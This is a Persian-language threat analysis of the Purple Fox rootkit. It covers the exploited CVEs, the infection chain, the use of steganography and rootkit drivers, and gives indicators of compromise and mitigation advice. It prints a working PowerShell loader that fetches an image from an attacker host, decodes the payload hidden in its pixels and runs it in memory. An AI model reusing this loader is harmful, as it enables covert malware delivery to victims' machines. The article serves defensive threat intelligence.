بدافزار Purple Fox؛ روت‌کیتی جاه‌طلب

Purple Fox، بدافزاری است که خود در نقش دریافت‌کننده بدافزارهای دیگر عمل می‌کند.

در دو سال اخیر روش‌های حمله و سازوکارهای انتشار Purple Fox به‌طور مستمر در حال تکامل بوده است.

اولین بار در مهر 1397، شرکت چیهو ۳۶۰ در مقاله‌ای انتشار این بدافزار را گزارش کرد.

در شهریور 1398، محققان شرکت ترند مایکرو خبر دادند که گردانندگان Purple Fox بجای استفاده از Nullsoft Scriptable Install System – به اختصار NSIS – در فرایند اجرای این بدافزار، به بهره‌گیری از پروسه معتبر PowerShell روی آورده‌اند. با این تکنیک (استفاده از یک پروسه معتبر سیستم عامل بجای فایل‌های مخرب)، Purple Fox به جمع بدافزارهای بدون فایل (Fileless) پیوست.

تا آن زمان همچنان Purple Fox از طریق بسته بهره‌جوی (Exploit Kit) معروف RIG و سوءاستفاده از آسیب‌پذیری‌های زیر منتشر می‌شد:

• CVE-2014-6332 و CVE-2018-8174 در بخش VBScript Engine مرورگر Internet Explorer
• CVE-2018-15982 در نرم‌افزار Flash Player
• CVE-2015-1701 و CVE-2018-8120 در سیستم عامل Windows

در تیر 1399، شرکت پروف‌پوینت گزارش کرد که CVE-2020-0674 (در مرورگر Internet Explorer) و CVE-2019-1458 (در سیستم عامل Windows) نیز به فهرست آسیب‌پذیری‌های مورد بهره‌جویی Purple Fox افزوده شده است.

شرکت سنتینل‌وان هم در 28 مهر 1399 اعلام کرد که Purple Fox مجهزتر از قبل قادر به بهره‌جویی از دو آسیب‌پذیری دیگر در سیستم عامل Windows با شناسه‌های CVE-2020-1054 و CVE-2019-0808 شده است.

توانایی سوءاستفاده از این تعداد بالا از آسیب‌پذیری‌ها سبب شده که بسیاری از شرکت های امنیتی Purple Fox را خود یک بسته بهره‌جو قلمداد کرده و از آن با عنوان Purple Fox EK یاد کنند.

در ماه‌های اخیر گزارش‌هایی مبنی بر مشاهده بدافزار Purple Fox بر روی سیستم‌های برخی از مؤسسات ایرانی به شرکت مهندسی شبکه گستر واصل شده است.

در ادامه این مطلب روش انتشار و برخی قابلیت‌های این بدافزار مخرب مورد بررسی و تحلیل قرار گرفته است.

هدف اصلی Purple Fox دریافت و توزیع بدافزارهای دیگر نظیر اسب‌های تروا، جاسوس‌افزارها، باج‌افزارها و استخراج‌کنندگان ارز رمز (Cryptominer) بر روی دستگاه قربانی است. Purple Fox در فرایند دریافت و نصب بدافزارهای دیگر از پروسه معتبر PowerShell بهره می‌گیرد.

Purple Fox از طریق سایت‌های حاوی بهره‌جو به دستگاه قربانی راه پیدا می‌کند. تبلیغات مخرب (Malvertising) و ایمیل‌های فیشینگ از اصلی‌ترین تکنیک‌های گردانندگان Purple Fox برای هدایت کاربر به این سایت‌ها محسوب می‌شوند. برای مثال تصویر زیر کد تبلیغ مخربی موسوم به Popcash را نمایش می‌دهد که کاربر را به سوی یک سایت حاوی بهره‌جوی CVE-2020-0674 هدایت می‌کند.

حداقل در نسخ جدید صفحات به اصطلاح فرود (Landing Page) این بدافزار به شدت رمزگذاری شده اند.

 به‌محض باز شدن هر یک از این سایت‌ها بر روی دستگاه آسیب‌پذیر، بدون هر گونه دخالت و اطلاع کاربر، فرایند آلودگی دستگاه به Purple Fox آغاز می‌شود.

در یکی از نمونه‌ها، بهره‌جو، پروسه mshta.exe را به همراه یک کد مخرب مبتنی VBScript اجرا می‌کند که در نتیجه آن پروسه PowerShell نیز فراخوانی می‌شود. در ادامه PowerShell کد مرحله بعد را دریافت و آن را در حافظه اجرا می‌کند.

Purple Fox سطح دسترسی کاربر جاری را بر روی دستگاه مورد بررسی قرار می‌دهد. در صورت فراهم بودن دسترسی Administrator، یک بسته MSI از طریق سایت مهاجمان نصب می‌شود. در غیر این صورت بهره‌جویی از آن دسته از آسیب‌پذیری‌های موجود در فهرست خود را که از نوع ضعف‌های “ترفیع امتیازی” (Privilege Escalation) محسوب می‌شوند در دستور کار قرار می‌دهد.

نکته قابل‌توجه در خصوص نسخ جدید Purple Fox این که برخی کدهای مخرب دریافت شده توسط آن، فایل‌هایی تصویری هستند که با بکارگیری تکنیک پنهان‌نگاری (‌Steganography)، کدهای دودویی (Binaries) در آنها جاسازی شده است. نمونه‌ای از این تصاویر در زیر قابل مشاهده است:

کد مخرب از تصویر مذکور با استفاده از کدهای زیر استخراج می‌شود:

$uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http[:]//rawcdn[.]githack[.]cyou/up.php?key=3"));$o=a Byte[] 589824;(0..575)|%{foreach($x in(0..1023)){$p=$g.GetPixel($x,$_);$o[$_*1024+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..589362]))' IEX ($uyxQcl8XomEdJUJd)

لازم به ذکر است که تمامی اسکریپت‌های مورد استفاده Purple Fox وجود کلیدی با عنوان “StayOnTop” را در مسیر HKCU\Software\7-Zip در محضرخانه (Regsitry) مورد بررسی قرار می‌دهند. احتمالاً هدف از این اقدام تشخیص اجرای موفق کد مخرب بر روی دستگاه است. بنابراین وجود چنین کلیدی می‌تواند نشانه‌ای از آلوده بودن دستگاه به Purple Fox باشد.

از جمله ویژگی‌هایی که Purple Fox را به یک بدافزار بسیار خطرناک تبدیل می‌کند عملکرد روت‌کیت (Rootkit) آن است. Purple Fox از تابع MsiInstallProductA به‌منظور دریافت و اجرای یک فایل msi که حاوی یک کد شل (Shell Code) رمزگذاری شده است استفاده می‌کند. به‌محض اجرا، دستگاه راه‌اندازی مجدد (Restart) می‌شود. Purple Fox کلید محضرخانه‌ای PendingFileRenameOperations را برای تغییر نام فایل‌های خود پس از راه‌اندازی مجدد مورد استفاده قرار می‌دهد.

همچنین با ایجاد یک پروسه svchost با وضعیت معلق‌شده (Suspended) و تزریق یک DLL، یک راه‌انداز (Driver) با قابلیت روت‌کیتی را ایجاد می‌کند. این راه‌انداز از دو فایل زیر تشکیل شده است:

• system%\drivers\dump_{random hex strings}.sys% که مسئول اجرای قابلت روت‌کیتی آن است.
• system%\Ms{random hex}App.dll% که بخش اصلی روت‌کیت در قالب یک DLL است.

با تکمیل پروسه نصب روت‌کیت، فایل‌ها و مسیرهای محضرخانه‌ای مرتبط با بدافزار از دید کاربر و محصولات امنیتی مخفی شده و صرفاً با استفاده از ابزارهای خاص قابل شناسایی و تشخیص خواهند بود.

به نظر می‌رسد که قابلیت روت‌کیتی Purple Fox بر اساس ابزار کد باز (Open Source) زیر توسعه داده شده است:

https://github.com/JKornev/hidden

نمونه روت‌کیت‌های Purple Fox که توسط کارشناسان شرکت مهندسی شبکه گستر بر روی برخی دستگاه‌های متعلق به شرکت‌های ایرانی کشف شده با نام‌های زیر قابل شناسایی است:

Bitdefender:
   Trojan.GenericKD.43279379

McAfee:
   RDN/Generic.dx
   Artemis!BC26145F6316

Sophos:
  Mal/VMProtBad-A

نکته حائز اهمیت دیگر در مورد بدافزار Purple Fox، استفاده نویسندگان آن از VMProtect برای مبهم‌سازی (Obfuscation) و دشوار ساختن تحلیل فایل‌های مخرب برای مهندسان ویروس و ابزارهای امنیتی است. VMProtect ابزاری است که موجب اجرای کد در یک ماشین مجازی با معماری غیرمعمول می‌شود.

اطمینان از نصب کامل اصلاحیه‌های امنیتی، بکارگیری محصولات امنیت نقاط پایانی قدرتمند در کنار آموزش کاربران در پرهیز از کلیک بر روی لینک‌های ناآشنا همگی در کنار یکدیگر می‌توانند سازمان را از گزند این نوع تهدیدات مخرب حفظ کنند.